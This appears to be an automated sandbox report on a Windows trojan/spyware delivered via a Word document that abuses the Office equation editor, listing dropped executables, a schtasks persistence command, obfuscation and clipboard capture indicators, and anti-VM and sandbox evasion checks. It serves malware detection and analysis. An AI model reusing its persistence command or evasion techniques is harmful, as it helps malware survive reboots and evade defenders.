Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large array initializations
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, <PrivateImplementationDetails>{022117B2-3EA8-40F0-B266-89CB8F70EABC}/91D3F524-3C30-4A8A-B058-9A8C003E6B70.cs Large array initialization: .cctor: array initializer size 11933
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54060 NtQueryInformationProcess, 4_2_00D54060
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54059 NtQueryInformationProcess, 4_2_00D54059
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00459000 4_2_00459000
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00458898 4_2_00458898
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045A908 4_2_0045A908
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00456180 4_2_00456180
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00459A0D 4_2_00459A0D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00455208 4_2_00455208
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00456529 4_2_00456529
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00454E92 4_2_00454E92
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045D09C 4_2_0045D09C
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045C959 4_2_0045C959
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045C968 4_2_0045C968
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_004599C0 4_2_004599C0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045A9BC 4_2_0045A9BC
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CB48 4_2_0045CB48
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CB58 4_2_0045CB58
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045AB3D 4_2_0045AB3D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045AC71 4_2_0045AC71
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00457CB0 4_2_00457CB0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CDA8 4_2_0045CDA8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CFA0 4_2_0045CFA0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D568E8 4_2_00D568E8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59080 4_2_00D59080
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D56468 4_2_00D56468
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59408 4_2_00D59408
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5AD01 4_2_00D5AD01
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D52900 4_2_00D52900
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59E88 4_2_00D59E88
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D597E8 4_2_00D597E8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54B68 4_2_00D54B68
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D568D7 4_2_00D568D7
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D528F8 4_2_00D528F8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D56458 4_2_00D56458
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D50048 4_2_00D50048
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59071 4_2_00D59071
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D50006 4_2_00D50006
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5A250 4_2_00D5A250
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59E78 4_2_00D59E78
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5A260 4_2_00D5A260
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59E2F 4_2_00D59E2F
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D52BD0 4_2_00D52BD0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D597D9 4_2_00D597D9
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D52BC0 4_2_00D52BC0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D593F9 4_2_00D593F9
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54F90 4_2_00D54F90
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54FA0 4_2_00D54FA0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54B1D 4_2_00D54B1D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00450330 4_2_00450330
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00450D98 4_2_00450D98
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0040568C 7_2_0040568C
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00402296 7_2_00402296
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D5338 7_2_002D5338
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D6350 7_2_002D6350
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D5680 7_2_002D5680
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D208F 7_2_002D208F
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045B0C8 7_2_0045B0C8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045AB48 7_2_0045AB48
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00453968 7_2_00453968
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045CB18 7_2_0045CB18
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00456DF8 7_2_00456DF8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00451798 7_2_00451798
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00456A70 7_2_00456A70
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00459EE0 7_2_00459EE0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00455BE0 7_2_00455BE0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045D3E0 7_2_0045D3E0
Source: ZhIOjFmINIXbKXm[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: cAFIUeWyVQPJe.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@9/14@9/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$RFQ ..doc
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Mutant created: \Sessions\1\BaseNamedObjects\uUxkFOSqwAhvdfFtRYTsdWC
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC8DA.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: (non-printable console output; content not recoverable from the report)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0136808F push es; iretd 4_2_013680A0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_004583D6 push ss; iretd 4_2_004583D7
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00459CD6 push esp; retn 003Fh 4_2_00459CD7
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00457F9B push ebp; retf 4_2_00457F9F
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5B15F pushad ; iretd 4_2_00D5B163
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5B169 pushad ; iretd 4_2_00D5B16D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D55BD0 push esp; ret 4_2_00D55BD9
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5232C push esi; iretd 4_2_00D5232D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0136808F push es; iretd 7_2_013680A0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00450D48 pushad ; retf 7_2_00450D49
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00451508 pushad ; iretd 7_2_00451509
Source: initial sample Static PE information: section name: .text entropy: 7.94722535195

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File created: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00405174 sldt word ptr [eax] 7_2_00405174
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Window / User API: threadDelayed 9416
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468 Thread sleep time: -103327s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2744 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2800 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2420 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476 Thread sleep time: -120000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2936 Thread sleep time: -120000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 103327
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 40000
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 30000
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: vmware
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2096028933.000000000020B000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
